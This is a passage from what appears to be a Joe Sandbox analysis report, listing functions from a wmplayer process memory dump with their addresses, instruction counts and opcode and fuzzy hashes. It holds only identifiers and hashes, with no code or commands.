                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c932d487c201d104d89b53c39b57c37d8b677f04e0e433114761c98f9509c45
                                              • Instruction ID: ab96db25e789e237bc9e9d9907d8fbe50028994fdcf47ee62718213e727e6cd3
                                              • Opcode Fuzzy Hash: 4c932d487c201d104d89b53c39b57c37d8b677f04e0e433114761c98f9509c45
                                              • Instruction Fuzzy Hash: BB41AE35E00214DBCB19DFA8C8A0BEDF7B8BF48710F18816AE815EB280D7349C41CBA4
                                              Function 03312750 Relevance: .1, Instructions: 137COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                              • Instruction ID: 84069895c297da518b3b6412e971f6074e24d2a7fd91516d4a2e4ed87239bc57
                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                              • Instruction Fuzzy Hash: 57514C75A40615DFCB14CF98C980AAEF7F6FF84710F2881A9D815AB350E734AE81CB90
                                              Function 0334D1C0 Relevance: .1, Instructions: 135COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                              • Instruction ID: 1a5768daa4b64f5113c20609b15a19a9064c6e9560da95a8736ca9f016475545
                                              • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                              • Instruction Fuzzy Hash: 63510875A00206DFCB18CF69D981699FBF1FF48314B18856ED81997746E734EA90CF90
                                              Function 032D6154 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2cf2334faafc4d566186541b85389c8de139e0b61e3e5971a3f9767965567a6c
                                              • Instruction ID: 602200526659d63e77e5c8ca88fb781d9100937912fa43396753d4d72ab22795
                                              • Opcode Fuzzy Hash: 2cf2334faafc4d566186541b85389c8de139e0b61e3e5971a3f9767965567a6c
                                              • Instruction Fuzzy Hash: 12512770920356DBCB29DB24CC45BA8B7B5FF05314F5882A9D426AB2D0D77899C1CF80
                                              Function 032CB136 Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2eaf051c528d9419bf281c053b7a0d0f878f15b42b9d5690bdffe2f2f99a76d5
                                              • Instruction ID: 33c3b68f430dd0b9690e25f6a0e4533d7b972c3ed18dcb861004905314589f9d
                                              • Opcode Fuzzy Hash: 2eaf051c528d9419bf281c053b7a0d0f878f15b42b9d5690bdffe2f2f99a76d5
                                              • Instruction Fuzzy Hash: F141BCB5A60351EFDB21EF64C881B2ABBECEF00794F044569E515DF2A0D7B0D880CB91
                                              Function 0339866E Relevance: .1, Instructions: 129COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                              • Instruction ID: 5b28fbce7f08974ce6cf87e0ccf9406274af16fd6e67bcb1694071d840a9b652
                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                              • Instruction Fuzzy Hash: 78417175B10219EBEF15DF99CCC4AAFB7BAAFC9640F18406AE905AF341D670DD0187A0
                                              Function 032FD6E0 Relevance: .1, Instructions: 126COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45f75ac4540c20cb7dd863d2631d6cb96b42135068da0f3ba46f0ae95986ca1b
                                              • Instruction ID: 943491046f096e24df9efdc048d343ff9a6469c7a1519698b188ed1f618d3f8a
                                              • Opcode Fuzzy Hash: 45f75ac4540c20cb7dd863d2631d6cb96b42135068da0f3ba46f0ae95986ca1b
                                              • Instruction Fuzzy Hash: 2841E379A24300DFD325FF26C8D0E2BB7A8EB46320F41462DE9558B290CB74F851CB91
                                              Function 032CA020 Relevance: .1, Instructions: 122COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                              • Instruction ID: df7126f2a92c4ce463751d84369caaafae6fde44b302ffc01d395c8d363ce333
                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                              • Instruction Fuzzy Hash: B8416E31A34669FBCB10DEA488C07BAFB71EB44795F19826EE9459F240D6718DC0CB91
                                              Function 03300710 Relevance: .1, Instructions: 121COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                              • Instruction ID: e18595b16ee882df571863a25f88c33db1ab69755f77f51e1a0edad382e1eb17
                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                              • Instruction Fuzzy Hash: 7E41F675A00705EFDB28CFA9C9D0BAAB7F8FB08700B10496DE556DB690D370AA44CB90
                                              Function 032D262C Relevance: .1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a35cc3e4b5eb593145f0e539c07862b74f6089b8e5c12857ef4138641ec6a510
                                              • Instruction ID: 7ac830ac2e3951778de9ebe4001d658ceb9bc6069c71d8d990199671a1201038
                                              • Opcode Fuzzy Hash: a35cc3e4b5eb593145f0e539c07862b74f6089b8e5c12857ef4138641ec6a510
                                              • Instruction Fuzzy Hash: AD41D375921704CFDB21EF24C981B69B7F9FF44310F188AADC4169B2A1DB70A981CF91
                                              Function 033507C3 Relevance: .1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d4d51920d8c3b1ce88f4146510161838868d0ac82d2017109cf74b90976a324
                                              • Instruction ID: ecbda1a8420491f48de1d126fae8e804e4efb3f5ac52839dc84a878d327bcdbc
                                              • Opcode Fuzzy Hash: 4d4d51920d8c3b1ce88f4146510161838868d0ac82d2017109cf74b90976a324
                                              • Instruction Fuzzy Hash: 1D417B769143409FD320EF29C885F9BFBE8FF88754F104A2AF99897251D770A944CB92
                                              Function 032E02E1 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                              • Instruction ID: 48e4c83feb5e20b935341e6feb619c8c1a49e5053c4877098c763614bebe8107
                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                              • Instruction Fuzzy Hash: 18311631A24344AFDB21DB69CC80B9ABBE9FF05350F0885A5E855DB351C6F4D8C5CBA4
                                              Function 032F9274 Relevance: .1, Instructions: 105COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 63804422de74fc0a925c0a75453ec71d6de55a5125916f8ccd5062a79485b1d9
                                              • Instruction ID: aecf56e86fed1b3b8e8b4930c820b0e39e1d20cbfa44c09a7a050f27607e2f22
                                              • Opcode Fuzzy Hash: 63804422de74fc0a925c0a75453ec71d6de55a5125916f8ccd5062a79485b1d9
                                              • Instruction Fuzzy Hash: 72319375A10328AFDB25DB24CC40B9AF7B9AF85310F1501A9A64CAB280DB719DC4CF51
                                              Function 032D5702 Relevance: .1, Instructions: 104COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03a1bc328d8830b98b5540a94909b27352ba0ee7190862284144f546e9c35f88
                                              • Instruction ID: e6815aeacd5eb6324ace94ceeebc830f3fbfc1ce5304a49187f90051b6ef3012
                                              • Opcode Fuzzy Hash: 03a1bc328d8830b98b5540a94909b27352ba0ee7190862284144f546e9c35f88
                                              • Instruction Fuzzy Hash: BE31D035621B06EFDB55DF24C980AA9F7A9FF45704F644065E9024BA50DBF4E860CBD0
                                              Function 032D4260 Relevance: .1, Instructions: 102COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: baf598cf198acd43da2fbac43f98bddf9fe02a43088e0c1ed7b64ec695a78afa
                                              • Instruction ID: fdff7d8e2ff5450c6bcba8549831ee88361fcb44001e1d008dcb2813deeadfe9
                                              • Opcode Fuzzy Hash: baf598cf198acd43da2fbac43f98bddf9fe02a43088e0c1ed7b64ec695a78afa
                                              • Instruction Fuzzy Hash: 9541D235214B45DFC726DF29C8C1FD6B7E9AF49714F148429E99ACB650CBB0E890CB90
                                              Function 032F50E4 Relevance: .1, Instructions: 101COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                              • Instruction ID: 8a58ee83c2c8de01aae4551ed24a89e0680de0e2c5ae1db7c12c5c391cb74d75
                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                              • Instruction Fuzzy Hash: 293108317283429FD721EA18C840767F7D4AB87B50F6C8179F6858B380D6B4D8C1C792
                                              Function 033961C3 Relevance: .1, Instructions: 97COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a419f431c65fdc6f5e8f41221a8243877b2e012631d3ec07e96f8c597a960ff
                                              • Instruction ID: e2c44b50d0cf2758802a2c67423f38b15188cf401be203a7c79be2dd8ba8b896
                                              • Opcode Fuzzy Hash: 6a419f431c65fdc6f5e8f41221a8243877b2e012631d3ec07e96f8c597a960ff
                                              • Instruction Fuzzy Hash: 57310479E01215EBEB15DF98CC81BAEF3B9EB44750F44416AE440AF244D774EC00CB90
                                              Function 033960B8 Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01490cf75cc50901c4015ebd9b4b9cbbf2f51fee53bbce614bb9a4e15fcf9f2a
                                              • Instruction ID: 1759d98dea8110d3e0bffc84caf176169fd72a429c9f55fa49fdc18aa39275d5
                                              • Opcode Fuzzy Hash: 01490cf75cc50901c4015ebd9b4b9cbbf2f51fee53bbce614bb9a4e15fcf9f2a
                                              • Instruction Fuzzy Hash: 2831E476A51305EFEF12EB69CCD2A6EB7ADAF44364F04406AE545DB341DA70DC018790
                                              Function 032D07AF Relevance: .1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5c5af5b3c6f016019ab4bb126c3ee8065ec87c917ef27010dc742dc0c50bc11
                                              • Instruction ID: 8f5c3a5499ff2773ffd2d8119abbe44849132d178b5f062cd4a9a5fda67890f8
                                              • Opcode Fuzzy Hash: a5c5af5b3c6f016019ab4bb126c3ee8065ec87c917ef27010dc742dc0c50bc11
                                              • Instruction Fuzzy Hash: 7731E536A24752DBC711DE64D880A6FBBA6EFC4650F05852DFC55EB320DA70DC8187E1
                                              Function 032CD6AA Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                              • Instruction ID: 92a46755b3bc48b7034e67c5f529f998c084ff1c6a38e90e3c4476a3bdb28571
                                              • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                              • Instruction Fuzzy Hash: D831D736A30285AFDB21DE54C880F6AB3A9DF80750F1D857DED059B200E770ED84CB50
                                              Function 032D57C0 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 29f4082bdd814a5c818f8bf8479957508c690178289697dac7e0d3bb8252223b
                                              • Instruction ID: 50466802f37c23b3f04d99b6265a995873eb73e1a08909347be50d627d35e2aa
                                              • Opcode Fuzzy Hash: 29f4082bdd814a5c818f8bf8479957508c690178289697dac7e0d3bb8252223b
                                              • Instruction Fuzzy Hash: AD31B239625A0AFFDB45DF24DE80A69BBA6FF45300F549065E8018BB50D7B0E870CB80
                                              Function 032F438F Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3265dcc2f3a499aa8747cc43b94b28c888257f18f2332d9dcc93f20f188321cb
                                              • Instruction ID: 7c99138c8488387a92311aaff3e394e2ac4ae953967f16dcc941c90b14f6967d
                                              • Opcode Fuzzy Hash: 3265dcc2f3a499aa8747cc43b94b28c888257f18f2332d9dcc93f20f188321cb
                                              • Instruction Fuzzy Hash: 9B31B135B207059FCB14EFA9C981A6FF7F9AB84304F048539D605E7254D7B0E985CB90
                                              Function 032D92C5 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                              • Instruction ID: c0a7203c33338522680b28f863251e17fd6b9d5691463ff08efd68f2c459e634
                                              • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                              • Instruction Fuzzy Hash: 2F3168B56183498FCB05DF18D88095BBBE9EF89350F040969F855DB3A1D770DC54CBA2
                                              Function 03327190 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                              • Instruction ID: 864a74742f537afd793ce1c6ddf755197fb79d49927f9032362977940efec44c
                                              • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                              • Instruction Fuzzy Hash: 70315575605316CFC710CF18C880956FBF5FF89310B2986A9E9589B326E730ED06CB91
                                              Function 0338C3CD Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                              • Instruction ID: 8273210ac7f411fe32cc8fca5b12997a449ac57dbc8725b4a0d15e4430a8a5e5
                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                              • Instruction Fuzzy Hash: 1721FB3EA00751A6CB15FBE58C80ABAF7B5EF40710F40A41AF9A68B691E674D9D0C770
                                              Function 032CC156 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cde27368d0a166c9739c3a393a753790802c9bdd16f7555a4e26d651be9eddeb
                                              • Instruction ID: 43aee6d7266e0f07821aa86ed7c364201349a8767932c97c9e78de8be114a766
                                              • Opcode Fuzzy Hash: cde27368d0a166c9739c3a393a753790802c9bdd16f7555a4e26d651be9eddeb
                                              • Instruction Fuzzy Hash: 9631FC765107208BC724FF18CCC5B69BB78EF41314F9881A9E9559F341DAB4D985CB90
                                              Function 032CE388 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                              • Instruction ID: 6f9ce55f1f4fae998c8ff389af4d9c0e69328cbeb61b0eaa2679a552c6c37573
                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                              • Instruction Fuzzy Hash: 83319A35620644EFD721DFA8C884F6AB7B9EF45354F1546A9E5128B280E770EE81CB50
                                              Function 0334E609 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89be8bb8edf618bcdafbce7b6469c8b960bde73d02760c4bd5d7b3a153fe6bfa
                                              • Instruction ID: 280213deea59f27dd119f3edcfee6f193e70017e5d5c7b7545ddf005b8285237
                                              • Opcode Fuzzy Hash: 89be8bb8edf618bcdafbce7b6469c8b960bde73d02760c4bd5d7b3a153fe6bfa
                                              • Instruction Fuzzy Hash: 5D316B79A102059FCB14CF1CC8809AEB7FAFF88304F19455AE8099B391E775FA51CB94
                                              Function 032D3616 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fbd000d9a6f52837d646fc39c4429cc2864ea9df8164225827c4f7845022dd5
                                              • Instruction ID: 7c2c8ab9cc314e3991f9a59342da41a7c2a21b99a84c6e9567dfefc526aef05d
                                              • Opcode Fuzzy Hash: 8fbd000d9a6f52837d646fc39c4429cc2864ea9df8164225827c4f7845022dd5
                                              • Instruction Fuzzy Hash: 6E2104392257519FDB71EF04C985B2ABBA8FF80B10F59086DEA511B651C7B0EC84CBD2
                                              Function 032FF32A Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                              • Instruction ID: 8c8be40ece58fbe09be7ae4263b54b1d7fdf8700d818b9d134c16428060627b9
                                              • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                              • Instruction Fuzzy Hash: 66219272220701AFC719DF15C641B66F7E9EF85365F15417DE20A8B790EBB0E881CB94
                                              Function 033506F1 Relevance: .1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef8feafe822c39d31dab6003a4e262c667a1f3028e9ca48a318290cf7a85dfdd
                                              • Instruction ID: dee1dc74ee7ebd6e1292f92a509f5106bdebaf2c36f0d68e4f9d3a0d56fb853e
                                              • Opcode Fuzzy Hash: ef8feafe822c39d31dab6003a4e262c667a1f3028e9ca48a318290cf7a85dfdd
                                              • Instruction Fuzzy Hash: B9219C75A10229EBCF14DF69C881ABEB7F8FF48740F540069F941AB240E779AD51CBA0
                                              Function 0335019F Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53d880d200b8ac5e020b48409578b4601f1fe1add416e910315c5214f9c5edef
                                              • Instruction ID: e2eac5601190b3db6ae77e1d254221b3d6bcc6c0a56afb50a4eeb5b71d443283
                                              • Opcode Fuzzy Hash: 53d880d200b8ac5e020b48409578b4601f1fe1add416e910315c5214f9c5edef
                                              • Instruction Fuzzy Hash: 9321AE79610644AFD719DBA8CC80F6AB7B8FF48740F180069F944DB690D675ED50CBA8
                                              Function 03309660 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc3e0e9a8a4a8607fd24b52f49d944e38582fdebfe235271ca6c0ba2fb57363d
                                              • Instruction ID: f3fb56cb83e70c24770488e59b5edfcfb5e6cef97f59bee418dda696ac9924ee
                                              • Opcode Fuzzy Hash: cc3e0e9a8a4a8607fd24b52f49d944e38582fdebfe235271ca6c0ba2fb57363d
                                              • Instruction Fuzzy Hash: E421D331624748DBDB31EB25CCE1B2A77A9BB80330F18475DE4524A9F2DB31B8418B56
                                              Function 03350283 Relevance: .1, Instructions: 74COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
